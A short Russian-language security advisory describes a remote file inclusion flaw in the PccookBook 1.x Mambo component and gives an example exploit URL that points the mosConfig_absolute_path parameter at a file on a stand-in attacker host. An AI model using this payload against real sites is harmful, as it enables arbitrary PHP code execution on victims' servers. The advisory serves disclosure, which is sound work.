• Партнер

  • Программа: PccookBook 1.x (компонент Mambo)

    Уязвимость позволяет удаленному
    пользователю выполнить произвольный PHP код
    на целевой системе. Данные, переданные в
    параметре mosConfig_absolute_path скрипта pccookbook.php не
    проверяются, в результате атакующий может
    подключить произвольный локальный и
    внешний файл. Для работы требуется что бы
    опция "register_globals" была включена.

    Пример:

    http://[target]/[path]/components/com_pccookbook/pccookbook.php? mosConfi
    g_absolute_path=http://attacker.com/evil.txt?

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии